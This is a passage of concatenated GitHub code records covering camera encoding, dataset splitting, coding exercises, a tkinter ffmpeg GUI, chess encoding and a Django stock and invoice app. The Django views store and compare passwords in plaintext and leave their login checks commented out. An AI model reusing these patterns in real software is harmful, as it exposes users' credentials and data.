\"-add\", file_name, encoded_file_name])\n files_name_list.append(encoded_file_name)\n logger.info(\"Successfully encoded video to mp4: %s\", encoded_file_name)\n except subprocess.CalledProcessError:\n files_name_list.append(file_name)\n logger.error(\"CalledProcessError raised while encoding, use raw %s\", file_name)\n except Exception as err:\n files_name_list.append(file_name)\n logger.error(\"Exception raised, message: %s\", err)\n\n return files_name_list\n","repo_name":"spellancer/rpi-alarm-system","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"36414804663","text":"import numpy as np\nimport random\nimport logging\nfrom sslplay.utils.ssplit import ssplit\n\ndef s3split(\n X, y, \n percentage_1, percentage_2, percentage_3, \n seed_1=1102, seed_2=1102, \n):\n\n assert percentage_1 >= 0\n assert percentage_2 >= 0\n assert percentage_3 >= 0\n assert percentage_1 + percentage_2 + percentage_3 > 0\n\n y = np.array(y)\n X = np.array(X)\n\n tmp_percentage_sum = percentage_1 + percentage_2 + percentage_3 + 0.0\n percentage_1 = percentage_1 / tmp_percentage_sum * 100\n percentage_2 = percentage_2 / tmp_percentage_sum * 100\n percentage_3 = percentage_3 / tmp_percentage_sum * 100\n\n int_n = len(y)\n assert X.shape[0] == int_n\n \n tmp_y_counts = np.unique(y, return_counts=True)\n assert np.min(tmp_y_counts[1]) >= 3\n\n array_classes = sorted(tmp_y_counts[0])\n int_n_classes = len(array_classes)\n assert np.max(array_classes) + 1 == int_n_classes\n\n X1, y1, Xtmp, ytmp = ssplit(\n X=X, y=y, \n percentage_1=percentage_1, \n percentage_2=100.0-percentage_1, \n min_el_1=1, \n min_el_2=2, \n seed=seed_1\n )\n\n X2, y2, X3, y3 = ssplit(\n X=Xtmp, y=ytmp, \n percentage_1=percentage_2, \n percentage_2=percentage_3, \n min_el_1=1, \n min_el_2=1, \n seed=seed_2\n )\n\n logging.debug(\"Set 1 expected percentage: \" + str(round(percentage_1, 4)) + \" | real percentage: \" + str(round(len(y1) / int_n * 100, 4)))\n logging.debug(\"Set 2 expected percentage: \" + str(round(percentage_2, 4)) + \" | real percentage: \" + str(round(len(y2) / int_n * 100, 4)))\n logging.debug(\"Set 3 expected percentage: \" + str(round(percentage_3, 4)) + \" | real percentage: \" + str(round(len(y3) / int_n * 100, 4)))\n\n return X1, y1, X2, y2, X3, y3\n","repo_name":"ngshya/ssl-play","sub_path":"sslplay/utils/s3split.py","file_name":"s3split.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"9358475312","text":"s = input()\r\n\r\nmaxk = 0\r\nk = 0\r\nfor i in s:\r\n if i == \")\":\r\n k += 1\r\n else:\r\n maxk = max(maxk, k)\r\n k = 0\r\nmaxk = max(maxk, k)\r\nprint(maxk)\r\nprint(max(len(i) for i in s.split(\"(\")))\r\n","repo_name":"trofik00777/EgeInformatics","sub_path":"probn/01.04/24.py","file_name":"24.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"39532081739","text":"def seq():\r\n termos = int(input('Digite um número '))\r\n e = 1\r\n for fat in range(1,termos+1):\r\n fatorial = 1 \r\n i=1\r\n while i <= fat:\r\n fatorial = fatorial * i \r\n i = i + 1\r\n print('O fatorial de {} é {}.'.format(fat,fatorial))\r\n e = e + (1 / fatorial)\r\n print('E=',e)\r\ndef main():\r\n seq()\r\nmain() \r\n \r\n","repo_name":"kevenescovedo/exercicios-python-func-o-2-semestre-ADS-conteudo-da-p1","sub_path":"lista function/list 1/exercicio10.py","file_name":"exercicio10.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"1833146509","text":"from matplotlib import pyplot as plt\nimport _init_path\nfrom datacollection.user_app.backend.app.post_processing import SequenceLoader\n\n\ndef show_image(img, title=\"show_image\"):\n ndim = img.ndim\n print(\"ndim:\", ndim)\n if img.ndim == 2:\n plt.imshow(img.cpu().numpy(), cmap=\"gray\")\n else:\n plt.imshow(img.cpu().numpy())\n plt.title(title)\n plt.show()\n\n\nif __name__ == \"__main__\":\n rec_id = \"12_19\"\n\n loader = SequenceLoader(rec_id=rec_id, device=\"cuda:0\", debug=True)\n\n print(\"device_id:\\n\", loader.device_id)\n print(\"depth_mode:\\n\", loader.depth_mode)\n print(\"pv_width:\\n\", loader.pv_width)\n print(\"pv_height:\\n\", loader.pv_height)\n print(\"depth_width:\\n\", loader.depth_width)\n print(\"depth_height:\\n\", loader.depth_height)\n print(\"num_frames:\\n\", loader.num_frames)\n print(\"pv_intrinsic:\\n\", loader.pv_intrinsic)\n print(\"pv2rig:\\n\", loader.pv2rig)\n print(\"depth2rig:\\n\", loader.depth2rig)\n print(\"depth_xy1:\\n\", loader.depth_xy1)\n print(\"depth_scale:\\n\", loader.depth_scale)\n\n loader.step_by_frame_id(100)\n print(\"frame_id:\\n\", loader.frame_id)\n points = loader.points\n print(\"points:\\n\", points.shape, points.dtype, points.device)\n color_img = loader.color_image\n print(\"color_img:\\n\", color_img.shape, color_img.dtype, color_img.device)\n depth_img = loader.depth_image\n print(\"depth_img:\\n\", depth_img.shape, depth_img.dtype, depth_img.device)\n depth_colored = loader.depth_colored\n print(\n \"depth_coloried:\\n\",\n depth_colored.shape,\n depth_colored.dtype,\n depth_colored.device,\n )\n\n show_image(color_img, title=\"color_img\")\n show_image(depth_img, title=\"depth_img\")\n show_image(depth_colored, title=\"depth_colored\")\n","repo_name":"Error-Dataset/data-collection","sub_path":"tests/sequence_loader.py","file_name":"sequence_loader.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"19"} +{"seq_id":"22699933807","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nLeetcode - Unique Email Addresses\r\nhttps://leetcode.com/problems/unique-email-addresses\r\n\r\nCreated on Mon Nov 19 18:01:33 2018\r\n@author: Arthur Dysart\r\n\"\"\"\r\n\r\n\r\n## REQUIRED MODULES\r\nimport sys\r\n\r\n\r\n## MODULE DEFINITIONS\r\nclass Solution:\r\n \"\"\"\r\n Traverse all elements of array\r\n\r\n Time complexity: O(n)\r\n - Iterate over all string elements\r\n Space complexity: O(n)\r\n - Amortized store all unique strings\r\n \"\"\"\r\n\r\n def count_unique_emails(self, a):\r\n \"\"\"\r\n Determines number of unique emails in input array.\r\n\r\n :param list[str] a: array of input emails\r\n :return: number of unique target emails\r\n :rtype: int\r\n \"\"\"\r\n if not a:\r\n return 0\r\n\r\n s = set()\r\n\r\n n = len(a)\r\n for i in range(n):\r\n l, r = a[i].split(\"@\")\r\n l = l.replace(\".\",\"\").split(\"+\")[0]\r\n m = \"@\".join([l, r])\r\n s.add(m)\r\n \r\n return len(s)\r\n\r\nclass Input:\r\n\r\n def stdin(self, sys_stdin):\r\n \"\"\"\r\n Imports standard input.\r\n\r\n :param _io.TextIOWrapper sys_stdin: standard input\r\n :return: array of input emails\r\n :rtype: int\r\n \"\"\"\r\n inputs = [x.strip(\"[]\\n\") for x in sys_stdin]\r\n a = [x.strip(\"\\\"\")\r\n for x\r\n in inputs[0].split(\"\\\",\\\"\")]\r\n return a\r\n\r\n\r\n## MAIN MODULE\r\nif __name__ == \"__main__\":\r\n # Import exercise parameters\r\n a = Input()\\\r\n .stdin(sys.stdin)\r\n\r\n # Evaluate solution\r\n z = Solution()\\\r\n .count_unique_emails(a)\r\n print(z)\r\n\r\n\r\n## END OF FILE","repo_name":"arthurdysart/LeetCode","sub_path":"0929_unique_email_addresses/python_source.py","file_name":"python_source.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"23190794325","text":"import random\nfrom resources import data\n\n#choice anyone\n\ndef compare():\n already=[]\n win=False\n score=0\n while True:\n while True: #Garantir que não sorteie duas opções iguais\n if not win:\n n= random.randint(0, len(data)-1)\n person1= data[n]\n elif win:\n person1= person2\n while True:\n m= random.randint(0, len(data)-1)\n person2= data[m]\n if m not in already:\n already.append(m)\n break\n if n!=m:\n break\n print('__'*40)\n print(f\"Compare A: {person1['name']}, a {person1['description']}, from {person1['country']}.\\nVS\")\n print(f\"Against B: {person2['name']}, a {person2['description']}, from {person2['country']}.\")\n print('__'*40)\n a= person1['follower_count']\n b= person2['follower_count']\n if a>=b:\n champ= person1\n elif a 1 and ans[-1] == 0:\n ans.pop()\n \n print(ans)\n return \"\".join(map(str, ans[::-1]))\n","repo_name":"DragonKnightMax/LeetCoding-Challenge","sub_path":"November 2021/07-MultiplyStrings.py","file_name":"07-MultiplyStrings.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"72652078123","text":"'''\nresponsible for GUI, imports, and conversion\n'''\n\nfrom tkinter import * # imports all files from tkinter\nfrom tkinter import ttk # imports (ttk?)\nimport ffmpeg # imports ffmpeg\nimport shutil # allows for the file to be saved into PyGame, briefly, so that the code has access\nimport os # os is used so that the computer knows where paths to files are; removes copies\n # so that the user's memory is crowded with unnecessary junk\nfrom tkinter.filedialog import askopenfilename # this specific aspect is used to find the path to the user's file\nfrom PIL import Image, ImageTk\n\ncur_directory = os.getcwd()\n\n'''\nthis section is responsible for the uploading, conversion, and text of the file\n'''\n\n\n# function that opens a menu bar and allows the use to chose files that have the ending .mp4,\n # .avi, .webm, .mov, and .wav. Saves the value of that file to the originalFile variable\ndef open_file():\n file = askopenfilename(filetypes = [('mp4 Files', '*.mp4'),\n ('avi Files', '*.avi'),\n ('webm Files', '*.webm'),\n ('mov Files', '*.mov'),\n ('wav Files', '*.wav')])\n\n return file\n\n# this method is responsible for the heavy lifting; when the user choses a file (video) to open, it\n # takes that file, converts it so that it is only audio, then uploads it into the same file that\n # the folder is - for now. Later on, it will be possible to integrate this directly into the\n # conversion algorithm we're working on\n \ndef run_conversion():\n video = open_file() # creates a string 'video' with the location of the video user chose\n if video == '': # if the user cancels, '' is returned; catches the error\n return\n global cur_directory # creates a string 'cur_directory' with the location of the folder\n path = shutil.copy2(video, cur_directory) # creates variable of copy that is created in python folder\n \n # takes in the file that the user input; the file, currently, needs to be in the same folder as the code\n stream = ffmpeg.input(video)\n\n # separates the audio from the video file\n audio = stream.audio\n\n # creates a new ouput called 'outAudioWebM.wav' with the audio file that was created\n out = ffmpeg.output(audio, 'newSave.wav')\n\n # runs/(maybe opens, if you are on Windows) the file, just to listen to it and make sure it works\n out.run()\n\n os.remove(path)\n\n# root is the root window that this program uses. When a button is placed in root, it is placed in the window\nroot = Tk() # creates new window using tkinter\nroot.geometry('800x600') # the size of the window\nroot.title('Transcribing Program') # the name of the window\nroot.resizable(False, False) # prevents the user from resizing the window\n\ncanvas = Canvas(width = 900, height = 700)\n\nbck_image = Image.open(str(cur_directory + '/BlurryBackground.jpeg')) # creates an image file\ncopy_bck_image = bck_image.copy() # copies the files, bc original file is deleted after being used\nnew_bck = bck_image.resize((900,700))\nbck_fill = ImageTk.PhotoImage(bck_image) # turns the image into a format tkinter can use\n\n# places the blurry background image on the canvas to serve as a background\ncanvas.create_image(400, 300, image = bck_fill, anchor = CENTER)\n\nfront_image = Image.open(str(cur_directory + '/button.png')) #finds the button picture\ncopy_f_image = front_image.copy() # creates a copy of button picture to replace original if\n # something gets deleted\nnew_image = front_image.resize((180,240)) # resizes the image so that it will fit in the canvas\nfront_fill = ImageTk.PhotoImage(new_image) # converts the image into a format tkinter can use\n\ncanvas.create_image(400, 300, image = front_fill) # adds a box in front of background to\n # hold program options\ncanvas.pack(fill = BOTH) # fills both left and right side of parent widget(root)\n\n# creates a label that will be placed on canvas\noption_intro = Label(canvas, bg = '#2A2661', fg = 'pink', font = ('Times New Roman', 16),\n text = 'Program Options')\noption_intro.pack() # places the label on the canvas\n\n# places the option label on the canvas without chaninging the canvas's size\ncanvas.create_window(400, 200, anchor = CENTER, window = option_intro)\n\n# creates the button that will ask the user for an upload\nbtn = Button(text ='Upload Files', command = lambda:run_conversion())\nbtn.pack(pady = 10, side = BOTTOM)\n # moves the button down 10 units and places it on the bottom of the parent widget\n\n# creates a window on canvas and adds the button to it\ncanvas.create_window(400, 360, anchor = CENTER, window = btn)\n\n# a loop that will run continuously to check if the user clicked a button on the root panel\nroot.mainloop()\n","repo_name":"evelyn-needham/Voicelle","sub_path":"GUIConversionFOlder/GuiAndConversion.py","file_name":"GuiAndConversion.py","file_ext":"py","file_size_in_byte":5166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2688851726","text":"import numpy as np\nimport chess\nimport pickle\nimport os\n\nNORMALIZE_MOBILITY = 64\nNORMALIZE_PIECE_NUMBER = 8\nNORMALIZE_50_MOVE_RULE = 50\nMAX_NB_MOVES = 500\n\nCHANNEL_PIECES = 0\nCHANNEL_REPETITION = 12\nCHANNEL_EN_PASSANT = 14\nCHANNEL_CASTLING = 15\nCHANNEL_NO_PROGRESS = 19\nCHANNEL_COLOR = 20\nCHANNEL_MOVE_NR = 21\nCHANNEL_LAST_MOVES = 22\n\nNB_CHANNELS_TOTAL = 24\nNB_LAST_MOVES = 1\n\n\ndef get_row_col(position, mirror=False):\n \"\"\"\n Maps a value [0,63] to its row and column index\n :param position: Position id which is an integer [0,63]\n :param mirror: Returns the indices for the mirrored board\n :return: Row and columns index\n \"\"\"\n # returns the column and row index of a given position\n row = position // 8\n col = position % 8\n\n if mirror:\n row = 7 - row\n\n return row, col\n\n\ndef board_to_planes(board: chess.Board, board_occ=0, normalize=False, last_moves=None):\n \"\"\"\n 5 planes\n * * *\n\n Total: 22 planes\n :param board: Board handle (Python-chess object)\n :param board_occ: Number of board occurrences\n :param normalize: True if the inputs shall be normalized to the range [0.-1.]\n :param last_moves:\n :return: planes - the plane representation of the current board state\n \"\"\"\n\n # return the plane representation of the given board\n # return variants.board_to_planes(board, board_occ, normalize, mode=MODE_CHESS)\n planes = np.zeros((24, 8, 8)).astype(int)\n\n # channel will be incremented by 1 at first plane\n channel = 0\n me = board.turn\n you = not board.turn\n colors = [me, you]\n\n # mirror all bitboard entries for the black player\n mirror = board.turn == chess.BLACK\n\n assert channel == CHANNEL_PIECES\n # Fill in the piece positions\n # Channel: 0 - 11\n # Iterate over both color starting with WHITE\n for color in colors:\n # the PIECE_TYPE is an integer list in python-chess\n for piece_type in chess.PIECE_TYPES:\n # iterate over the piece mask and receive every position square of it\n for pos in board.pieces(piece_type, color):\n row, col = get_row_col(pos, mirror=mirror)\n # set the bit at the right position\n planes[channel, row, col] = 1\n channel += 1\n\n assert channel == CHANNEL_REPETITION\n # Channel: 12 - 13\n # set how often the position has already occurred in the game (default 0 times)\n # this is used to check for claiming the 3-fold repetition rule\n if board_occ >= 1:\n planes[channel, :, :] = 1\n if board_occ >= 2:\n planes[channel + 1, :, :] = 1\n channel += 2\n\n # Channel: 14\n # En Passant Square\n assert channel == CHANNEL_EN_PASSANT\n if board.ep_square and board.has_legal_en_passant(): # is not None:\n row, col = get_row_col(board.ep_square, mirror=mirror)\n planes[channel, row, col] = 1\n channel += 1\n\n # Channel: 15 - 18\n assert channel == CHANNEL_CASTLING\n for color in colors:\n # check for King Side Castling\n if board.has_kingside_castling_rights(color):\n planes[channel, :, :] = 1\n channel += 1\n # check for Queen Side Castling\n if board.has_queenside_castling_rights(color):\n planes[channel, :, :] = 1\n channel += 1\n\n # Channel: 19\n # (IV.4) No Progress Count\n # define a no 'progress' counter\n # it gets incremented by 1 each move\n # however, whenever a piece gets dropped, a piece is captured or a pawn is moved, it is reset to 0\n # half-move_clock is an official metric in fen notation\n # -> see: https://en.wikipedia.org/wiki/Forsyth%E2%80%93Edwards_Notation\n # check how often the position has already occurred in the game\n assert channel == CHANNEL_NO_PROGRESS\n planes[channel, :, :] = board.halfmove_clock / NORMALIZE_50_MOVE_RULE if normalize else board.halfmove_clock\n channel += 1\n\n assert channel == CHANNEL_COLOR\n # (IV.1) Color\n if board.turn == chess.WHITE:\n planes[channel, :, :] = 1\n # otherwise the mat will remain zero\n channel += 1\n\n assert channel == CHANNEL_MOVE_NR\n planes[channel, :, :] = board.fullmove_number / MAX_NB_MOVES if normalize else board.fullmove_number\n channel += 1\n\n # Channel: 22 - 23\n assert channel == CHANNEL_LAST_MOVES\n # Last move\n if last_moves:\n assert (len(last_moves) == NB_LAST_MOVES)\n for move in last_moves:\n if move:\n from_row, from_col = get_row_col(move.from_square, mirror=mirror)\n to_row, to_col = get_row_col(move.to_square, mirror=mirror)\n planes[channel, from_row, from_col] = 1\n channel += 1\n planes[channel, to_row, to_col] = 1\n channel += 1\n else:\n channel += 2\n else:\n channel += NB_LAST_MOVES * 2\n\n assert channel == NB_CHANNELS_TOTAL\n\n return planes\n\n\ndef save_as_pickle(directory, filename, data):\n completeName = os.path.join(directory, filename)\n with open(completeName, 'wb') as output:\n pickle.dump(data, output)\n\n\ndef load_pickle(directory, filename):\n completeName = os.path.join(directory, filename)\n with open(completeName, 'rb') as pkl_file:\n data = pickle.load(pkl_file)\n return data\n","repo_name":"Migga98/MultimodalLearningChess","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5294,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"14879232328","text":"from django.shortcuts import render,redirect\nfrom django.http import HttpResponse\nimport csv\nfrom .models import *\nfrom .forms import *\nfrom django.contrib import messages\n# from django.contrib.auth.decorators import login_required\nfrom django.template.loader import get_template\nfrom xhtml2pdf import pisa\nimport pdfkit\nfrom io import BytesIO\n\n\n# Create your views here.\n\ndef home(request):\n title = 'Welcome to the Invoice & Stock management '\n context = {\n \"title\": title,\n }\n # return redirect('/list_items')\n return render(request, \"home.html\",context)\n\n#@login_required\ndef list_view(request):\n header = 'List of items'\n form = StockSearchForm(request.POST or None)\n queryset=Stock.objects.all()\n context = {\n \"header\": header,\n \"queryset\":queryset,\n \"form\": form,\n\n }\n if request.method == 'POST':\n category = form['category'].value()\n \n queryset = Stock.objects.filter(\n item_name__icontains=form['item_name'].value(),\n price__icontains=form['price'].value()\n )\n if (category != ''):\n queryset = queryset.filter(category_id=category)\n\n if form['export_to_CSV'].value() == True:\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = 'attachment; filename=\"List of stock.csv\"'\n writer = csv.writer(response)\n writer.writerow(['CATEGORY', 'ITEM NAME', 'QUANTITY','PRICE'])\n instance = queryset\n for stock in instance:\n writer.writerow([stock.category, stock.item_name, stock.quantity,stock.price])\n return response\n\n context = {\n \"form\": form,\n \"header\": header,\n \"queryset\": queryset,}\n return render(request, \"list_item.html\",context)\n\n#@login_required\ndef add_items(request):\n form = StockCreateForm(request.POST or None)\n if form.is_valid():\n form.save()\n messages.success(request, 'Successfully Saved')\n return redirect('/list_items')\n context = {\n \"form\": form,\n \"title\": \"Add Item\",\n }\n return render(request, \"add_items.html\", context)\n\n#@login_required\ndef update_items(request, pk):\n queryset = Stock.objects.get(id=pk)\n form = StockUpdateForm(instance=queryset)\n if request.method == 'POST':\n form = StockUpdateForm(request.POST, instance=queryset)\n if form.is_valid():\n form.save()\n messages.success(request, 'Successfully Updated')\n return redirect('/list_items')\n context = {\n 'form':form,\n 'title':\"Update Item\"\n }\n return render(request, 'add_items.html', context)\n\n#@login_required\ndef delete_items(request, pk):\n queryset = Stock.objects.get(id=pk)\n if request.method == 'POST':\n queryset.delete()\n messages.success(request, 'Successfully Deleted')\n return redirect('/list_items')\n return render(request, 'delete_items.html')\n#@login_required\ndef stock_detail(request, pk):\n\tqueryset = Stock.objects.get(id=pk)\n\tcontext = {\n\t\t\"queryset\": queryset,\n\t}\n\treturn render(request, \"stock_details.html\", context)\n\n#@login_required\ndef issue_items(request, pk):\n queryset = Stock.objects.get(id=pk)\n form = IssueForm(request.POST or None, instance=queryset)\n if form.is_valid():\n instance = form.save(commit=False)\n # instance.receive_quantity = 0\n instance.quantity -= instance.issue_quantity\n instance.issue_by = str(request.user)\n messages.success(request, \"Issued SUCCESSFULLY. \" + str(instance.quantity) + \" \" + str(instance.item_name) + \"s now left in Store\")\n instance.save()\n issue_history = StockHistory(\n # id = instance.id, \n last_updated = instance.last_updated,\n category_id = instance.category_id,\n item_name = instance.item_name, \n quantity = instance.quantity, \n issue_to = instance.issue_to, \n issue_by = instance.issue_by, \n issue_quantity = instance.issue_quantity, \n )\n issue_history.save()\n return redirect('/stock_detail/'+str(instance.id))\n # return HttpResponseRedirect(instance.get_absolute_url())\n\n context = {\n \"title\": 'Issue ' + str(queryset.item_name),\n \"queryset\": queryset,\n \"form\": form,\n \"username\": 'Issue By: ' + str(request.user),\n }\n return render(request, \"add_items.html\", context)\n\n\n#@login_required\ndef receive_items(request, pk):\n queryset = Stock.objects.get(id=pk)\n form = ReceiveForm(request.POST or None, instance=queryset)\n if form.is_valid():\n instance = form.save(commit=False)\n # instance.issue_quantity = 0\n instance.quantity += instance.receive_quantity\n instance.receive_by = str(request.user)\n instance.save()\n receive_history = StockHistory(\n # id = instance.id, \n last_updated = instance.last_updated,\n category_id = instance.category_id,\n item_name = instance.item_name, \n quantity = instance.quantity, \n price = instance.price,\n receive_quantity = instance.receive_quantity, \n receive_by = instance.receive_by\n )\n receive_history.save()\n messages.success(request, \"Received SUCCESSFULLY. \" + str(instance.quantity) + \" \" + str(instance.item_name)+\"s now in Store\")\n\n return redirect('/stock_detail/'+str(instance.id))\n # return HttpResponseRedirect(instance.get_absolute_url())\n context = {\n \"title\": 'Reaceive ' + str(queryset.item_name),\n \"instance\": queryset,\n \"form\": form,\n \"username\": 'Receive By: ' + str(request.user),\n }\n return render(request, \"add_items.html\", context)\n\n#@login_required\ndef reorder_level(request, pk):\n\tqueryset = Stock.objects.get(id=pk)\n\tform = ReorderLevelForm(request.POST or None, instance=queryset)\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.save()\n\t\tmessages.success(request, \"Reorder level for \" + str(instance.item_name) + \" is updated to \" + str(instance.reorder_level))\n\n\t\treturn redirect(\"/list_items\")\n\tcontext = {\n\t\t\t\"instance\": queryset,\n\t\t\t\"form\": form,\n\t\t}\n\treturn render(request, \"add_items.html\", context)\n\n\n#@login_required\ndef list_history(request):\n header = 'HISTORY OF ITEMS'\n queryset = StockHistory.objects.all()\n form = StockHistorySearchForm(request.POST or None)\n context = {\n \"header\": header,\n \"form\": form,\n \"queryset\": queryset,\n }\n if request.method == 'POST':\n category = form['category'].value()\n queryset = StockHistory.objects.filter(\n item_name__icontains=form['item_name'].value(),\n last_updated__range=[\n form['start_date'].value(),\n form['end_date'].value()\n ]\n )\n\n if (category != ''):\n queryset = queryset.filter(category_id=category)\n\n if form['export_to_CSV'].value() == True:\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = 'attachment; filename=\"Stock History.csv\"'\n writer = csv.writer(response)\n writer.writerow(\n ['CATEGORY', \n 'ITEM NAME',\n 'QUANTITY', \n 'PRICE',\n 'ISSUE QUANTITY', \n 'RECEIVE QUANTITY', \n 'RECEIVE BY', \n 'ISSUE BY', \n 'LAST UPDATED'])\n instance = queryset\n for stock in instance:\n writer.writerow(\n [stock.category, \n stock.item_name, \n stock.quantity, \n stock.price,\n stock.issue_quantity, \n stock.receive_quantity, \n stock.receive_by, \n stock.issue_by, \n stock.last_updated])\n return response\n\n context = {\n \"form\": form,\n \"header\": header,\n \"queryset\": queryset,\n }\n return render(request, \"list_history.html\",context)\n\n\ndef add_category(request):\n\tform = CategoryCreateForm(request.POST or None)\n\tif form.is_valid():\n\t\tform.save()\n\t\tmessages.success(request, 'Successfully Created')\n\t\treturn redirect('/list_items')\n\tcontext = {\n\t\t\"form\": form,\n\t\t\"title\": \"Add Category\",\n\t}\n\treturn render(request, \"add_items.html\", context)\n\n\ndef CustomerFormView(request):\n form=CustomerForm(request.POST or None)\n if form.is_valid():\n cust = CustomerDetails()\n cust.cust_name = request.POST['cust_name']\n cust.contact_num = request.POST['contact_num']\n cust.email = request.POST['email']\n cust.address = request.POST['address']\n cust.address_2 = request.POST['address_2']\n cust.landmark = request.POST['landmark']\n cust.country = request.POST['country']\n cust.state = request.POST['state']\n cust.city = request.POST['city']\n cust.pincode = request.POST['pincode']\n cust.save()\n return redirect('customer_form')\n return render(request,'customerform.html',{'form':form})\n\ndef CustomerView(request):\n model = CustomerDetails.objects.all()\n header=\"Customer\"\n return render(request,'customer.html',{'model':model,'header':header})\n\n\n#@login_required\ndef delete_Customer(request, pk):\n queryset = CustomerDetails.objects.get(id=pk)\n if request.method == 'POST':\n queryset.delete()\n messages.success(request, 'Successfully Deleted')\n return redirect('/customer_view')\n return render(request, 'delete_customer.html')\n\n\ndef update_customer(request, pk):\n queryset = CustomerDetails.objects.get(id=pk)\n form = CustomerUpdateForm(instance=queryset)\n if request.method == 'POST':\n form = CustomerUpdateForm(request.POST, instance=queryset)\n if form.is_valid():\n form.save()\n messages.success(request, 'Successfully Updated')\n return redirect('/customer_view')\n context = {\n 'form':form,\n 'title':\"Update Customer details\"\n }\n return render(request, 'customerform.html', context)\n\n\ndef add_invoice(request):\n cust = CustomerDetails.objects.all()\n form = invoiceForm(request.POST or None)\n if form.is_valid():\n form.save()\n return redirect('/customer_view')\n context = {\n 'form':form,\n 'title':\"Add Invoice\",\n 'cust':cust,\n }\n return render(request, 'Invoice.html', context)\n\n\ndef ProductForm(request):\n invo = Invoice_Details.objects.all()\n stock = Stock.objects.all()\n if request.POST:\n prod = Product()\n prod.Invoice = Invoice_Details.objects.get(Invoice_num=request.POST['Invoice'])\n prod.Product_name = request.POST['Product_name']\n prod.Qty = request.POST['Qty']\n prod.Price = request.POST['Price']\n prod.Discount = request.POST['Discount']\n prod.Cgst = request.POST['Cgst']\n prod.Sgst = request.POST['Sgst']\n prod.Igst = request.POST['Igst']\n prod.Total = request.POST['Total']\n prod.disc_rs = request.POST['disc_rs']\n prod.save()\n messages.success(request, 'Successfully added')\n return redirect('/productform/')\n return render(request,'productform.html',{'invo':invo,'stock':stock})\n\n\n\n\ndef InvoicePage(request,id):\n cust_data = CustomerDetails.objects.get(id=id)\n in_data = Invoice_Details.objects.filter(Cust_name=cust_data)\n invo = []\n pro = []\n pro_tot = []\n \n for i in in_data:\n print(i)\n invo.append(i)\n pro_count = Product.objects.filter(Invoice=i).count()\n print(pro_count)\n pro.append(pro_count)\n t = 0\n pro_data = Product.objects.filter(Invoice=i)\n for i in pro_data:\n t += float(i.Total)\n pro_tot.append(t)\n \n \n data = zip(invo,pro,pro_tot)\n request.session['pro_tot'] = t\n return render(request,'invoice_list.html',{'cust':cust_data,'invo':data})\n \n\ndef view_Invoice(request,id):\n in_data = Invoice_Details.objects.get(Invoice_num=id)\n prod=Product.objects.filter(Invoice=in_data)\n t=0\n list=[]\n for i in prod:\n t+=float(i.Total)\n list.append(i)\n print(list,t)\n data = {\"rec\":in_data,'prod':list,'pr':prod,'pro_tot':t}\n return render(request,'viewinvoice.html',data)\n\n\ndef render_to_pdf(template_src, context_dict={}):\n template = get_template(template_src)\n html = template.render(context_dict)\n result = BytesIO()\n pdf = pisa.pisaDocument(BytesIO(html.encode(\"ISO-8859-1\")), result)\n if not pdf.err:\n return HttpResponse(result.getvalue(), content_type='application/pdf')\n return None\n\ndef Shop_PDF(request,id):\n in_data = Invoice_Details.objects.get(Invoice_num=id)\n prod=Product.objects.filter(Invoice=in_data)\n t=0\n list=[]\n for i in prod:\n t+=float(i.Total)\n list.append(i)\n print(list,t)\n # pro_tot=request.session['pro_tot']\n data = {\"rec\":in_data,'prod':list,'pr':prod,'pro_tot':t}\n pdf = render_to_pdf('GeneratePdf.html', data)\n return HttpResponse(pdf, content_type='application/pdf')\n\n\ndef InvoiceDelete(request,invo_del):\n data = Invoice_Details.objects.get(Invoice_num=invo_del)\n data.delete()\n return redirect('customer_view')\n\n\n\n\ndef signup(request):\n form=userForm(request.POST or None)\n users=UserDetails.objects.all()\n if request.POST:\n model=UserDetails()\n model.name=request.POST['name']\n model.email=request.POST['email']\n model.phone=request.POST['phone']\n model.user_id=request.POST['user_id']\n model.password_1=request.POST['password_1']\n model.password_2=request.POST['password_2']\n for i in users:\n if(model.email== i.email):\n messages.error(request,'Email already Registered')\n return redirect (\"signup\") \n else:\n model.save() \n return redirect(\"login\")\n return render(request,\"signup.html\",{'form':form})\n\n\n\ndef login(request):\n if request.POST:\n # try:\n user_id=request.POST['user_id']\n Password=request.POST['Password']\n obj=UserDetails.objects.get(user_id=user_id)\n if obj.password_1==Password:\n return redirect('list_items')\n else:\n messages.error(request,'Wrong Password')\n return redirect('login')\n \n # except:\n # return HttpResponse('No user')\n return render(request,'login.html')","repo_name":"lunatic9824/Invoice-stock_Management","sub_path":"src/stockmanagement/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28411094327","text":"import tkinter\nimport time\n\ndef board_coord(x):\n return 30 + 40*x\n\nclass ChessView:\n root = tkinter.Tk()\n root.title(\"Chinese Chess\")\n root.resizable(0, 0)\n can = tkinter.Canvas(root, width=373, height=410)\n can.pack(expand=tkinter.YES, fill=tkinter.BOTH)\n img = tkinter.PhotoImage(file=\"images/WHITE.gif\")\n can.create_image(0, 0, image=img, anchor=tkinter.NW)\n piece_images = dict()\n move_images = []\n def draw_board(self, board):\n self.piece_images.clear()\n self.move_images = []\n pieces = 